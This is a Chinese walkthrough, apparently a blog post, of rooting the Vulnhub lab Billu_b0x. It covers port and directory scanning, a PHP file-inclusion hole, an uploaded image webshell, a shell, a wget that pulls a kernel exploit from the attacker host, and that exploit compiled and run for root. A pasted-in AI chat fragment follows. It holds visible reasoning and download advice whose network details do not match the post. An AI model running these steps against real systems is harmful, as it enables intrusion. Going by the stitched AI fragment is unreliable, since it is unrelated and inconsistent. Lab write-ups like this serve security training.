Vulnhub靶机:Billu_b0x

一、介绍

运行环境:Virtualbox

攻击机:kali(192.168.56.101)

靶机:Billu_b0x(192.168.56.107)

目标:获取靶机root权限和flag

靶机下载地址:https://download.vulnhub.com/billu/Billu_b0x.zip

二、信息收集

使用nmap主机发现靶机ip:192.168.56.107

在这里插入图片描述

使用nmap端口扫描发现靶机开放端口:22、80

nmap -A 192.168.56.107 -p 1-65535

在这里插入图片描述

打开网站发现是一个登录页面,查看源码未发现隐藏信息

在这里插入图片描述

直接使用sqlmap探测是否具有sql注入漏洞,没有发现sql注入漏洞

sqlmap -u http://192.168.56.107/ --dbs --forms

使用gobuster和dirsearch工具进行目录爆破,浏览器访问这些爆破出来的目录访问

gobuster dir -u http://192.168.56.107/ -x txt,php,html,bak --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

dirsearch -u http://192.168.56.107/                           

在这里插入图片描述
在这里插入图片描述

访问/in.php,发现网站根目录

在这里插入图片描述

访问/add.php文件,发现上传图片功能,尝试上传文件,发现均上传失败

在这里插入图片描述

访问/test.php文件,发现显示“file”参数为空,可以猜测这里存在文件包含漏洞

在这里插入图片描述

访问/phpmy/目录,发现是phpmyadmin登录页面

在这里插入图片描述

三、漏洞利用

文件包含漏洞利用,使用GET传递参数失败,使用POST传参成功

在这里插入图片描述

包含网站文件,看看有没有什么敏感信息,发现包含c.php时,得到数据库用户名密码:billu:b0x_billu

mysqli_connect(host,username,password,dbname,port,socket);

在这里插入图片描述

使用数据库用户名密码登录phpmyadmin

在这里插入图片描述

发现网站的用户名密码:biLLu:hEx_it

在这里插入图片描述

登录网站发现添加用户功能点存在文件上传的地方

在这里插入图片描述

上传php文件,上传失败,只能上传图片文件

构造图片马,将图片马上传,上传成功

copy 1.jpg/b+shell.php/a shell.jpg

在这里插入图片描述
在这里插入图片描述

使用test.php文件包含漏洞包含图片马,包含失败,会直接读取该图片的内容

在这里插入图片描述

查看test.php的源码,发现test.php是使用readfile函数读取文件内容,并不能包含文件

在这里插入图片描述

查看网站其它文件代码,看看有没有利用的地方,发现存在continue参数的时候,load参数可以进行文件包含

if(isset($_POST['continue']))
{
	$dir=getcwd();
	$choice=str_replace('./','',$_POST['load']);
	if($choice==='add')
	{
       		include($dir.'/'.$choice.'.php');
			die();
	}
    if($choice==='show')
	{
		include($dir.'/'.$choice.'.php');
		die();
	}
	else
	{
		include($dir.'/'.$_POST['load']);
	}
}

在这里插入图片描述

构造代码,包含之前上传的图片马,反弹shell

在这里插入图片描述
在这里插入图片描述

获取交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述

四、提权

使用cat /etc/issue命令查看靶机的发行版本信息,使用uname -a命令查看靶机内核版本信息

在这里插入图片描述

使用searchsploit搜索Ubuntu 12.04 的历史漏洞,我们选择linux/local/37292.c

searchsploit Ubuntu 12.04 

在这里插入图片描述

将该exp下载下来,使用web服务器将exp上传到靶机

searchsploit -m linux/local/37292.c  

在这里插入图片描述

wget http://192.168.56.101/37292.c

在这里插入图片描述

使用gcc编译,执行,获取root权限

gcc 37292.c -o 37292
./37292

在这里插入图片描述

未发现flag

参考链接:https://blog.youkuaiyun.com/qq_52576844/article/details/122405136

<think>好的,我需要处理用户关于下载billu_b0x的请求。首先,用户提到想通过百度网盘下载这个资源,并引用了某个参考来源。根据引用内容,用户可能已经有一个百度网盘的链接,但需要提取码wxhn。不过,我需要验证这个链接是否仍然有效,以及资源是否安全合规。 接下来,我需要考虑用户可能遇到的问题。例如,链接失效、提取码错误,或者下载后的文件无法正确导入VMware。此外,用户可能对设置NAT模式的网络配置有疑问,或者渗透测试过程中遇到技术障碍。 另外,用户的需求可能不仅限于下载,还可能包括如何配置环境和进行后续的渗透测试步骤。因此,生成相关问题时,需要涵盖下载步骤、环境配置、常见问题解决以及实际应用场景。 最后,要确保回答符合系统级指令,正确使用LaTeX格式,并添加引用标识。同时,保持回答结构清晰,分步骤帮助用户解决问题,并保证信息的准确性和安全性。</think>关于billu_b0x靶场资源的下载与使用,根据引用内容中提供的信息[^1],具体操作步骤如下: 1. **百度网盘下载** - 访问百度网盘链接(需自行搜索最新有效链接) - 输入提取码:$wxhn$(注意字母大小写) - 下载后解压得到虚拟机文件 2. **虚拟机配置** ```bash # 设置NAT模式网络 VMware菜单栏 > 编辑 > 虚拟网络编辑器 > 选择NAT模式 ``` 需确保攻击机(如Kali Linux)和靶机使用相同的网络模式,配置示意图: $$ \begin{cases} \text{攻击机IP} \in 192.168.153.0/24\\ \text{靶机IP} \in 192.168.153.0/24 \end{cases} $$ 3. **渗透测试验证** 建议使用Nmap进行基础探测: ```python import nmap scanner = nmap.PortScanner() scanner.scan('192.168.153.0/24', arguments='-sP') ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huang0c

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值